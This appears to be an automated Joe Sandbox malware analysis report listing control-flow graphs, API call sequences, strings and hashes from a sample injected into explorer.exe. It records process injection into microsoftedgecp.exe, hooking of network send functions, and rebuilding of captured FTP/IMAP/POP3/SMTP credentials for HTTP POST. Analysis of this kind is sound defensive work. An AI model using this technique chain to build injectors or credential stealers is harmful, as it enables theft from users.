                                                        control_flow_graph 112 87728-87745 113 8774b-87758 112->113 114 8790d 112->114 115 8776a-8776f 113->115 114->114 116 87771 115->116 117 87760-87765 116->117 118 87773 116->118 119 87766-87768 117->119 120 87778-8777a 118->120 119->115 119->116 121 8777c-87781 120->121 122 87783-87787 120->122 121->122 122->120 123 87789 122->123 124 8778b-87792 123->124 125 87794-87799 123->125 124->120 124->125 126 877a8-877aa 125->126 127 8779b-877a4 125->127 130 877ac-877b1 126->130 131 877b3-877b7 126->131 128 8781a-8781d 127->128 129 877a6 127->129 134 87822-87825 128->134 129->126 130->131 132 877b9-877be 131->132 133 877c0-877c2 131->133 132->133 136 877e4-877f3 133->136 137 877c4 133->137 135 87827-87829 134->135 135->134 138 8782b-8782e 135->138 140 87804-87811 136->140 141 877f5-877fc 136->141 139 877c5-877c7 137->139 138->134 142 87830-8784c 138->142 143 877c9-877ce 139->143 144 877d0-877d4 139->144 140->140 146 87813-87815 140->146 141->141 145 877fe 141->145 142->135 147 8784e 142->147 143->144 144->139 148 877d6 144->148 145->119 146->119 149 87854-87858 147->149 150 877d8-877df 148->150 151 877e1 148->151 152 8785a-87870 LoadLibraryA 149->152 153 8789f-878a2 149->153 150->139 150->151 151->136 154 87871-87876 152->154 155 878a5-878ac 153->155 154->149 156 87878-8787a 154->156 157 878ae-878b0 155->157 158 878d0-87900 VirtualProtect * 2 155->158 160 8787c-87882 156->160 161 87883-87890 GetProcAddress 156->161 162 878b2-878c1 157->162 163 878c3-878ce 157->163 159 87904-87908 158->159 159->159 164 8790a 159->164 160->161 165 87899-8789c 161->165 166 87892-87897 161->166 162->155 163->162 164->114 166->154
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000086000.00000040.80000000.00040000.00000000.sdmp, Offset: 00086000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_86000_explorer.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
                                                        • Instruction ID: 9b19febec4c14d8985e07823db6ea8ccfd6019d3ec10bd7ab69b27837b6b85f3
                                                        • Opcode Fuzzy Hash: 3c5445227933b7c7884a948d87e6e6edbd1f0b00d7431add8d286fe8315b697d
                                                        • Instruction Fuzzy Hash: FF512B7194C3918FD722AA78CC847B57BE0FB52320B390679C5E9CB3CAEB949805C761

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 167 82861-82871 GetProcessHeap RtlAllocateHeap
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
                                                        • Instruction ID: 77588290d4e37ef700697110175aaff6c1c57f9cd16726c1ee75de6bd7924a5a
                                                        • Opcode Fuzzy Hash: dd8bd5360c9c98a9841e087fd6d4da07649c860a1a6323a56136c81b20943975
                                                        • Instruction Fuzzy Hash: 8CA002715502507FFD4557A4FD1DF557A19B7C5B11F0045447189C50609968554C9F21

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082608: VirtualQuery.KERNEL32(00084434,?,0000001C), ref: 00082615
                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,756F3E2E,microsoftedgecp.exe,?), ref: 0008184E
                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00081889
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00081919
                                                        • RtlMoveMemory.NTDLL(00000000,00083428,00000016), ref: 00081940
                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00081968
                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00081978
                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00081992
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0008199A
                                                        • CloseHandle.KERNEL32(00000000), ref: 000819A8
                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819AF
                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000819C5
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000819CC
                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000819E2
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A0C
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081A1F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081A26
                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00081A2D
                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00081A41
                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00081A58
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081A65
                                                        • CloseHandle.KERNEL32(?), ref: 00081A6B
                                                        • CloseHandle.KERNEL32(?), ref: 00081A71
                                                        • CloseHandle.KERNEL32(00000000), ref: 00081A74
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                        • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                        • API String ID: 1066286714-4141090125
                                                        • Opcode ID: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
                                                        • Instruction ID: 9f5633c6449d72ef76d13a6fe6a98af6d308b0c36e19ae64f2dd6a10d85f2928
                                                        • Opcode Fuzzy Hash: b93d06834f6a1b31c03425c76c15e44102fa25189e47d0077c7e9fd67a3e8666
                                                        • Instruction Fuzzy Hash: 47618E31105304AFE710EF65DC84EABBBECFF89B54F000519F989D6291DA74DA058B62

                                                        Control-flow Graph

                                                        APIs
                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
                                                        • lstrlen.KERNEL32(?,00000000), ref: 0008267A
                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
                                                        • wsprintfA.USER32 ref: 000826B6
                                                        • CryptDestroyHash.ADVAPI32(?), ref: 000826CF
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                        • String ID: %02X
                                                        • API String ID: 3341110664-436463671
                                                        • Opcode ID: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
                                                        • Instruction ID: 6f7decda94893415d9c613d86727ea4291130fd5527fc19c423d8df5fa7bf1f8
                                                        • Opcode Fuzzy Hash: fc706adbc229e9871d075a65bcf97a68664b66aeeab1e926bd154e23bee0acba
                                                        • Instruction Fuzzy Hash: D51128B1A00108BFEB119B95EC98EAEBFBCFB88B41F104065F645E2160D6758F119B60

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                          • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0008109E,?,00081010), ref: 0008134A
                                                        • GetCurrentProcessId.KERNEL32(00000003,?,0008109E,?,00081010), ref: 0008135B
                                                        • wsprintfA.USER32 ref: 00081372
                                                          • Part of subcall function 0008263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0008265A
                                                          • Part of subcall function 0008263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00082672
                                                          • Part of subcall function 0008263E: lstrlen.KERNEL32(?,00000000), ref: 0008267A
                                                          • Part of subcall function 0008263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00082685
                                                          • Part of subcall function 0008263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0008269F
                                                          • Part of subcall function 0008263E: wsprintfA.USER32 ref: 000826B6
                                                          • Part of subcall function 0008263E: CryptDestroyHash.ADVAPI32(?), ref: 000826CF
                                                          • Part of subcall function 0008263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 000826D9
                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00081389
                                                        • GetLastError.KERNEL32 ref: 0008138F
                                                        • Sleep.KERNEL32(000001F4), ref: 000813A1
                                                          • Part of subcall function 000824D5: GetCurrentProcessId.KERNEL32 ref: 000824E7
                                                          • Part of subcall function 000824D5: GetCurrentThreadId.KERNEL32 ref: 000824EF
                                                          • Part of subcall function 000824D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
                                                          • Part of subcall function 000824D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
                                                          • Part of subcall function 000824D5: CloseHandle.KERNEL32(00000000), ref: 00082566
                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 000813B8
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000813BF
                                                        • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 000813E4
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000813EB
                                                          • Part of subcall function 00081DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00081E1D
                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0008141D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                        • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                        • API String ID: 706757162-1430290102
                                                        • Opcode ID: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
                                                        • Instruction ID: e1150cd2257c806cacc2476d6baa2bc67bd95f910a78fb5d1cafcba5e1534409
                                                        • Opcode Fuzzy Hash: 4fec015cbb2ac13bf4a1c12d5512f26f0fe35a9b684991f6ddbd7004c2ccbf0f
                                                        • Instruction Fuzzy Hash: 1D317531340615BBDF107FA0DC1ABDE3B59BF95F41F005014FAC69A292CF799A528BA1

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 235 81647-8165a 236 81748-8174f 235->236 237 81660-81662 235->237 237->236 238 81668-8166b 237->238 238->236 239 81671-8167d lstrlen 238->239 240 81683-8168a lstrlen 239->240 241 81747 239->241 240->241 242 81690-816a8 getpeername 240->242 241->236 242->241 243 816ae-816ca inet_ntoa htons 242->243 243->241 244 816cc-816d4 243->244 245 81708 244->245 246 816d6-816d9 244->246 249 8170d-8173c call 82861 wsprintfA call 824ae 245->249 247 816db-816de 246->247 248 816f3-816f8 246->248 250 816e0-816e3 247->250 251 81701-81706 247->251 248->249 249->241 259 8173e-81745 call 82843 249->259 254 816fa-816ff 250->254 255 816e5-816ea 250->255 251->249 254->249 255->248 257 816ec-816f1 255->257 257->241 257->248 259->241
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                        • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                        • API String ID: 3379139566-1703351401
                                                        • Opcode ID: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
                                                        • Instruction ID: d5608456101c3c778587acf2e152922007bce819ecc53712541b90b68493945c
                                                        • Opcode Fuzzy Hash: 03f0530a0a7ee1c63c3f1577a01795ef3f55d768128e7972553bc29af73dd61b
                                                        • Instruction Fuzzy Hash: 97219236E04209ABAF517EA9CD885FE7AFDBF85701F084179E9C4D3211DA34CE129B64

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 267 81752-81774 GetModuleHandleA GetProcAddress 268 817c1-817c6 267->268 269 81776-817c0 RtlZeroMemory * 4 267->269 269->268
                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00081539,?,?,?,0008144B,?), ref: 00081763
                                                        • GetProcAddress.KERNEL32(00000000,?,00081539,?,?,?,0008144B,?), ref: 0008176A
                                                        • RtlZeroMemory.NTDLL(00084228,00000104), ref: 00081788
                                                        • RtlZeroMemory.NTDLL(00084118,00000104), ref: 00081790
                                                        • RtlZeroMemory.NTDLL(00084330,00000104), ref: 00081798
                                                        • RtlZeroMemory.NTDLL(00084000,00000104), ref: 000817A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MemoryZero$AddressHandleModuleProc
                                                        • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                        • API String ID: 1490332519-278825019
                                                        • Opcode ID: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
                                                        • Instruction ID: 530bc9f54433c06892bab1a68e75f7d045b8179b057df917c1f81b95164fa071
                                                        • Opcode Fuzzy Hash: 0d8de067e37a3c8e510e18b4f3f54e50335b4ff64490c8f9c8ca228bf60caefa
                                                        • Instruction Fuzzy Hash: 29F0823278032D33852032EABC0AD4BBE5CFBD1FA63420161B7C4AB281D8996A004BF4

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 271 824d5-82513 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 272 82561-82563 271->272 273 82515-82519 272->273 274 82565-82572 CloseHandle 272->274 275 8251b-8251f 273->275 276 82555-8255b Thread32Next 273->276 275->276 277 82521-8253a OpenThread 275->277 276->272 278 8253c-82542 SuspendThread 277->278 279 82544 ResumeThread 277->279 280 8254a-82551 CloseHandle 278->280 279->280 280->276
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 000824E7
                                                        • GetCurrentThreadId.KERNEL32 ref: 000824EF
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000824FF
                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 0008250D
                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008252C
                                                        • SuspendThread.KERNEL32(00000000), ref: 0008253C
                                                        • CloseHandle.KERNEL32(00000000), ref: 0008254B
                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008255B
                                                        • CloseHandle.KERNEL32(00000000), ref: 00082566
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                        • String ID:
                                                        • API String ID: 1467098526-0
                                                        • Opcode ID: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
                                                        • Instruction ID: fb39f373af59805266f910fafb1a5732cded0f9030e1640caf296d2c8af7054c
                                                        • Opcode Fuzzy Hash: 13e0c775c2527d4a5f09ea347ca2aaf5247988b557232a428c51b9325d28ed3b
                                                        • Instruction Fuzzy Hash: B9118EB1044700EFE710AF60AC2CB6EBBA8FFC5B01F000529FAC192150D7399A498FA7

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 281 81f4a-81fa5 call 822b8 call 82861 call 827e2 call 82374 290 81fc0-81fcc 281->290 291 81fa7-81fbe 281->291 294 81fd0-81fd2 290->294 291->294 295 81fd8-8200f RtlZeroMemory 294->295 296 822a6-822b5 call 82843 294->296 300 8229e-822a5 295->300 301 82015-82030 295->301 300->296 302 82062-82074 301->302 303 82032-82043 call 822e5 301->303 308 82078-8207a 302->308 309 82045-82054 303->309 310 82056 303->310 312 8228b-82291 308->312 313 82080-820dc call 82731 308->313 311 82058-82060 309->311 310->311 311->308 314 8229a 312->314 315 82293-82295 call 82843 312->315 321 820e2-820e7 313->321 322 82284 313->322 314->300 315->314 323 820e9-820fa 321->323 324 82101-8212f call 82861 wsprintfW 321->324 322->312 323->324 327 82148-8215f 324->327 328 82131-82133 324->328 334 8219e-821b8 327->334 335 82161-82197 call 82861 wsprintfW 327->335 329 82134-82137 328->329 330 82139-8213e 329->330 331 82142-82144 329->331 330->329 333 82140 330->333 331->327 333->327 339 821be-821d1 334->339 340 82261-82277 call 82843 334->340 335->334 339->340 343 821d7-821ed call 82861 339->343 348 82279-8227b call 82843 340->348 349 82280 340->349 350 821ef-821fa 343->350 348->349 349->322 352 821fc-82209 call 82826 350->352 353 8220e-82225 350->353 352->353 357 82229-82236 353->357 358 82227 353->358 357->350 359 82238-8223c 357->359 358->357 360 8223e 359->360 361 82256-8225d call 82843 359->361 362 8223e call 82815 360->362 361->340 364 82243-82250 RtlMoveMemory 362->364 364->361
                                                        APIs
                                                          • Part of subcall function 00082861: GetProcessHeap.KERNEL32(00000008,0000A000,000810CC), ref: 00082864
                                                          • Part of subcall function 00082861: RtlAllocateHeap.NTDLL(00000000), ref: 0008286B
                                                          • Part of subcall function 000827E2: lstrlen.KERNEL32(000840DA,?,00000000,00000000,00081F86,75712B62,000840DA,00000000), ref: 000827EA
                                                          • Part of subcall function 000827E2: MultiByteToWideChar.KERNEL32(00000000,00000000,000840DA,00000001,00000000,00000000), ref: 000827FC
                                                          • Part of subcall function 00082374: RtlZeroMemory.NTDLL(?,00000018), ref: 00082386
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 00081FE2
                                                        • wsprintfW.USER32 ref: 0008211B
                                                        • wsprintfW.USER32 ref: 00082186
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00082250
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                        • API String ID: 4204651544-1701262698
                                                        • Opcode ID: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
                                                        • Instruction ID: 255fa56fcf304d2d87e24e71b666508560c75d90a8d3bc13f7fa8d1b7e7ffd1a
                                                        • Opcode Fuzzy Hash: e48be7de1766242c5f44ab3653c0dcb4d8e3a1e436a386c2fadcbc51b9c6efee
                                                        • Instruction Fuzzy Hash: A9A17E71609305AFD750EFA8C885A6BBBE8FF88740F10092DF9C5D7252DA74DE048B52

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 366 825ad-825c9 OpenProcess 367 825cb-825da IsWow64Process 366->367 368 82600-82607 366->368 369 825dc-825ec IsWow64Process 367->369 370 825f7 367->370 371 825f9-825fa CloseHandle 369->371 372 825ee-825f5 369->372 370->371 371->368 372->371
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000400,00000000,?,756F3E2E,?,?,microsoftedgecp.exe,00081287), ref: 000825BF
                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 000825D1
                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 000825E4
                                                        • CloseHandle.KERNEL32(00000000), ref: 000825FA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                        • String ID: microsoftedgecp.exe
                                                        • API String ID: 331459951-1475183003
                                                        • Opcode ID: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
                                                        • Instruction ID: 3f0c6239a235d8a9353f50cbffe2d8c9637570955e109b19aea4602d3b8e1d07
                                                        • Opcode Fuzzy Hash: 600cb7db61868d3c752ed1014d4c81f2ed1500a3007f689a1d6809e9e32329e4
                                                        • Instruction Fuzzy Hash: C8F03071942A18FFAB10DF949E988EE77ACFB01655B14026AF954A2140DB354F04EBA0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 421 81b17-81b2c 422 81b2e 421->422 423 81b60-81b68 421->423 424 81b30-81b5e RtlMoveMemory 422->424 425 81b6a-81b6f 423->425 426 81bc3-81bcb 423->426 424->423 424->424 429 81bbe-81bc1 425->429 427 81c0b 426->427 428 81bcd-81bdf 426->428 432 81c0d-81c12 427->432 428->427 431 81be1-81bfe LdrProcessRelocationBlock 428->431 429->426 430 81b71-81b84 LoadLibraryA 429->430 434 81b8a-81b8f 430->434 435 81c15-81c17 430->435 431->427 433 81c00-81c04 431->433 433->427 436 81c06-81c09 433->436 437 81bb6-81bb9 434->437 435->432 436->427 436->431 438 81bbb 437->438 439 81b91-81b95 437->439 438->429 440 81b9c-81b9f 439->440 441 81b97-81b9a 439->441 442 81ba1-81bab GetProcAddress 440->442 441->442 442->435 443 81bad-81bb3 442->443 443->437
                                                        APIs
                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 00081B4E
                                                        • LoadLibraryA.KERNEL32(?), ref: 00081B76
                                                        • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 00081BA3
                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081BF4
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.624562416.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_81000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                        • String ID:
                                                        • API String ID: 3827878703-0
                                                        • Opcode ID: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
                                                        • Instruction ID: 31b629b9df2a73af95de90739bfef73f464a0266a5217f3dfc158e275eeba735
                                                        • Opcode Fuzzy Hash: deeee95f3bd46ff30e3176e8a61dc90dd6eea73f4c86b4a940bb470ff21184f1
                                                        • Instruction Fuzzy Hash: 5A31AC75700612ABCB68DF29C894BA6B7ECBF15315B14456CE8C6CB200E735E846CBA0

                                                        Execution Graph

                                                        Execution Coverage:8.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:9
                                                        Total number of Limit Nodes:2
                                                        execution_graph 764 e9fab 765 e9fd8 764->765 766 ea1f3 764->766 769 ea048 765->769 773 ea04d 769->773 770 ea135 LoadLibraryA 770->773 771 ea190 VirtualProtect VirtualProtect 772 ea1e8 771->772 772->772 773->770 773->771 774 e9ff8 773->774

                                                        Callgraph

                                                        • Executed
                                                        • Not Executed
                                                        • Opacity -> Relevance
                                                        • Disassembly available
                                                        callgraph 0 Function_000E188C 27 Function_000E1838 0->27 1 Function_000EA00A 2 Function_000E3088 14 Function_000E2E98 2->14 55 Function_000E1B70 2->55 3 Function_000E2E08 13 Function_000E2418 3->13 41 Function_000E1D50 3->41 44 Function_000E18E8 3->44 46 Function_000E1860 3->46 4 Function_000E2508 32 Function_000E25C4 4->32 42 Function_000E18D0 4->42 45 Function_000E24E0 4->45 5 Function_000E1C08 6 Function_000E1A88 7 Function_000E1508 8 Function_000E1A04 9 Function_000E1405 10 Function_000E1000 11 Function_000E2E80 12 Function_000E141D 13->27 40 Function_000E2054 13->40 13->46 14->3 14->8 25 Function_000E2CB8 14->25 39 Function_000E1DD4 14->39 54 Function_000E2BF4 14->54 57 Function_000E2B70 14->57 15 Function_000E2010 15->8 16 Function_000E9FAB 30 Function_000EA048 16->30 17 Function_000E1C28 18 Function_000E45A7 19 Function_000EB124 20 Function_000E1822 21 Function_000E3020 21->14 21->55 22 Function_000E1D20 23 Function_000E2620 24 Function_000E3220 24->5 24->17 26 Function_000E1938 24->26 24->27 29 Function_000E1BB0 24->29 48 Function_000E2860 24->48 24->55 25->22 25->27 25->46 28 Function_000E14B2 30->1 31 Function_000E41C9 49 Function_000E25FC 32->49 33 Function_000E1F40 33->27 50 Function_000E18F8 33->50 34 Function_000E4A41 35 Function_000E355C 35->24 35->27 35->35 35->55 58 Function_000E30F0 35->58 36 Function_000E1C58 37 Function_000E1254 38 Function_000E14D4 39->27 40->0 40->15 40->26 40->27 40->33 40->42 40->46 40->50 56 Function_000E1E70 40->56 41->27 43 Function_000E156C 46->55 47 Function_000E1560 48->23 53 Function_000E2774 48->53 48->55 51 Function_000E14F9 52 Function_000E1576 57->8 57->27 58->4 58->6 58->27 58->36 58->46

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 118 e355c-e356c call e1b70 121 e35fc-e3601 118->121 122 e3572-e35a5 call e1838 118->122 126 e35a7 call e1838 122->126 127 e35d1-e35f6 NtUnmapViewOfSection 122->127 129 e35ac-e35c5 126->129 131 e3608-e3617 call e3220 127->131 132 e35f8-e35fa 127->132 129->127 137 e3619-e361c call e355c 131->137 138 e3621-e362a 131->138 132->121 133 e3602-e3607 call e30f0 132->133 133->131 137->138
                                                        APIs
                                                        • NtUnmapViewOfSection.NTDLL ref: 000E35D8
                                                        Memory Dump Source
                                                        • Source File: 00000019.00000002.624527841.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000E1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_25_2_e1000_explorer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SectionUnmapView
                                                        • String ID:
                                                        • API String ID: 498011366-0
                                                        • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                        • Instruction ID: 35eb1cebd07adc1b18c6b69b15e046bd059cdd6563af234ede06875f38d9c43f
                                                        • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                        • Instruction Fuzzy Hash: 9B119430715E495FEB5CBBB9989D2B93BE0EB54301F54412AA419D76A2DE398A40C701

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
